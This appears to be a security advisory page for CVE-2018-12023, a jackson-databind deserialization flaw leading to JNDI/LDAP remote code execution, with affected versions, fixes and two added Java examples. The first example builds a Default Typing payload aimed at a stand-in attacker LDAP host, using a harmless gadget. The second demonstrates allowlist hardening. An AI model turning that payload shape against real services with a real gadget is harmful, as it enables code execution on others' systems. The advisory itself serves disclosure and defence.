CVE-2018-12023
Deserialization vulnerability in jackson-databind (Maven)
What is CVE-2018-12023 About?
This vulnerability is an Insecure Deserialization issue in FasterXML jackson-databind that applies when Default Typing is enabled and the Oracle JDBC driver is on the classpath. Because Default Typing lets the JSON document name the concrete class to instantiate, an attacker can point it at a class in the Oracle driver that performs a JNDI lookup against an attacker-controlled LDAP server, which leads to remote code execution. Exploitation requires getting the application to deserialize a crafted JSON payload.
Affected Software
- com.fasterxml.jackson.core:jackson-databind
- >2.7.0, <2.7.9.4
- >2.9.0, <2.9.6
- >2.8.0, <2.8.11.2
Technical Details
The vulnerability exists in FasterXML jackson-databind when Default Typing is enabled (either globally or for a specific property) and the Oracle JDBC driver JAR is present in the classpath. With Default Typing on, polymorphic and Object-typed properties are deserialized from JSON that carries the fully qualified class name alongside the property values, so the sender of the JSON chooses which class is instantiated and which setters run. An attacker who controls an LDAP service crafts a JSON payload that names a class from the Oracle JDBC driver usable as a deserialization gadget. When jackson-databind instantiates that gadget and populates it with the attacker's values, it performs a JNDI lookup against the attacker's LDAP server, which returns a reference that makes the JVM load and execute attacker-supplied classes, resulting in arbitrary code execution on the target system.
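The mechanism above, as an added illustration that is not code from jackson-databind, from the Oracle driver or from this advisory: the mapper is configured with global Default Typing the way a vulnerable service would be, and the JSON names the class to instantiate. A hypothetical, harmless `FakeGadget` class stands in for the real Oracle JDBC gadget (its setter only records the string it receives instead of performing a JNDI lookup), and the payload is constructed for the demo, so nothing touches the network.

```java
import com.fasterxml.jackson.databind.ObjectMapper;

// Added example (not the project's code). Demonstrates why Default Typing on an
// Object-typed property hands class selection to whoever controls the JSON.
public class DefaultTypingDemo {

    // Hypothetical stand-in for a deserialization gadget. The real Oracle JDBC
    // gadget would pass the attacker-supplied name to a JNDI lookup; this one
    // only records it so the demo stays offline.
    public static class FakeGadget {
        public static String lastLookupTarget;   // what the gadget would have looked up

        public void setDataSourceName(String name) {
            lastLookupTarget = name;             // real gadget: new InitialContext().lookup(name)
        }
    }

    // The application's own type. A property declared as Object is exactly where
    // Default Typing (OBJECT_AND_NON_CONCRETE) lets the JSON supply the class name.
    public static class Envelope {
        public Object payload;
    }

    // Vulnerable configuration: Default Typing enabled globally, as the advisory
    // describes. enableDefaultTyping() is the pre-2.10 API used by affected versions.
    public static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return mapper;
    }

    // Returns the runtime class that the untrusted JSON caused Jackson to instantiate.
    public static String classChosenByInput(String json) throws Exception {
        Envelope env = vulnerableMapper().readValue(json, Envelope.class);
        return env.payload.getClass().getName();
    }

    public static void main(String[] args) throws Exception {
        // Constructed payload. With WRAPPER_ARRAY inclusion (the default for
        // enableDefaultTyping) the form is ["fully.qualified.Class", { properties }].
        // In a real attack the class would be the Oracle JDBC gadget and the string
        // an ldap:// URL pointing at the attacker's server.
        String json = "{\"payload\":[\"" + FakeGadget.class.getName() + "\","
                    + "{\"dataSourceName\":\"ldap://attacker.example:1389/x\"}]}";

        System.out.println("instantiated: " + classChosenByInput(json));
        System.out.println("setter received: " + FakeGadget.lastLookupTarget);
    }
}
```

Run it against any jackson-databind 2.x before 2.10 and the output shows that the class named inside the JSON was instantiated and that its setter received the attacker's string; swapping the stand-in for a class whose setter performs a JNDI lookup is all that separates this from the RCE described above.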
What is the Impact of CVE-2018-12023?
Successful exploitation may allow attackers to execute arbitrary code, gain full control of the affected system, compromise sensitive data, and disrupt service availability.
What is the Exploitability of CVE-2018-12023?
Exploitation requires three conditions to hold at once: Default Typing must be enabled in jackson-databind (globally or on a property of the type being deserialized), the Oracle JDBC JAR must be on the classpath, and the attacker must be able to run an LDAP service reachable from the target. The difficulty lies in these prerequisites rather than in the payload itself: once they are met, the JNDI/LDAP-to-RCE technique is public (see the Black Hat 2016 paper in Additional Resources) and the JSON is a short, static document. No authentication mechanism is bypassed, but the untrusted JSON may well arrive through an authenticated feature, so an ordinary user of the application can be the attacker. This is a remote scenario in which the attacker supplies the JSON input and the target has outbound network access to the attacker's LDAP server; an egress-restricted target cannot complete the gadget's lookup.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for CVE-2018-12023?
About the Fix from Resolved Security
This patch adds specific potentially dangerous classes to the blacklist in Jackson's SubTypeValidator, preventing them from being deserialized through Default Typing. It mitigates CVE-2018-12023 by blocking deserialization of the classes that could initiate attacker-directed network connections (such as LDAP or JDBC lookups), which attackers could exploit for remote code execution or data exfiltration. Note that a blacklist only covers gadgets that are already known; the series of later jackson-databind CVEs listed under Similar Vulnerabilities each added further entries, so the durable fix is to stop accepting attacker-chosen class names at all, either by disabling Default Typing or by restricting it to an explicit allowlist of your own types.
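The allowlist approach mentioned above, as an added example that is not the page's or the project's own patch: instead of relying on the blacklist that the fix extends, the mapper only allows polymorphic resolution to a named application type. This uses `activateDefaultTyping` and `BasicPolymorphicTypeValidator`, which exist from jackson-databind 2.10 onward (later than the fixed versions listed on this page), so it assumes you upgrade at least that far. The `Note`, `Envelope` and `NotAllowed` classes and the JSON inputs are constructed for the demo.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

// Added example (not the project's code). Same polymorphic property as a
// vulnerable service would expose, but class resolution is restricted to an
// explicit allowlist rather than a blacklist of known gadgets.
public class HardenedTypingDemo {

    public static class Envelope { public Object payload; }

    // The one concrete type the application intends to accept in "payload".
    public static class Note { public String text; }

    // Hypothetical stand-in for any class the attacker might name instead
    // (for the real attack, a gadget from the Oracle JDBC driver).
    public static class NotAllowed { public String dataSourceName; }

    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Note.class)        // only this exact subtype may be resolved
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Replaces enableDefaultTyping(); every type id in the JSON is checked by ptv.
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return mapper;
    }

    // Returns the class name that was instantiated, or "denied" if the validator refused.
    public static String tryParse(String json) throws Exception {
        try {
            Envelope env = hardenedMapper().readValue(json, Envelope.class);
            return env.payload.getClass().getName();
        } catch (InvalidTypeIdException e) {
            // Thrown when the PolymorphicTypeValidator denies the type id in the JSON.
            return "denied";
        }
    }

    public static void main(String[] args) throws Exception {
        String legit = "{\"payload\":[\"" + Note.class.getName() + "\",{\"text\":\"hello\"}]}";
        String attack = "{\"payload\":[\"" + NotAllowed.class.getName() + "\","
                      + "{\"dataSourceName\":\"ldap://attacker.example:1389/x\"}]}";

        System.out.println("legit  -> " + tryParse(legit));    // the Note class
        System.out.println("attack -> " + tryParse(attack));   // denied
    }
}
```

The allowed set is the application's own type, not a list of things to forbid, so a gadget that nobody has reported yet is rejected the same way as the Oracle one. If the service does not actually need polymorphic deserialization, not calling `activateDefaultTyping` at all is the simplest hardening.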
Available Upgrade Options
- com.fasterxml.jackson.core:jackson-databind
- >2.7.0, <2.7.9.4 → Upgrade to 2.7.9.4
- com.fasterxml.jackson.core:jackson-databind
- >2.8.0, <2.8.11.2 → Upgrade to 2.8.11.2
- com.fasterxml.jackson.core:jackson-databind
- >2.9.0, <2.9.6 → Upgrade to 2.9.6
Additional Resources
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://access.redhat.com/errata/RHSA-2019:1822
- https://access.redhat.com/errata/RHSA-2019:1140
- https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E
- https://access.redhat.com/errata/RHSA-2019:4037
- https://access.redhat.com/errata/RHSA-2019:3892
- https://www.oracle.com/security-alerts/cpujul2020.html
- https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
- https://access.redhat.com/errata/RHSA-2019:0782
What are Similar Vulnerabilities to CVE-2018-12023?
Similar Vulnerabilities: CVE-2017-7525, CVE-2017-15095, CVE-2018-7489, CVE-2019-12384, CVE-2020-2564
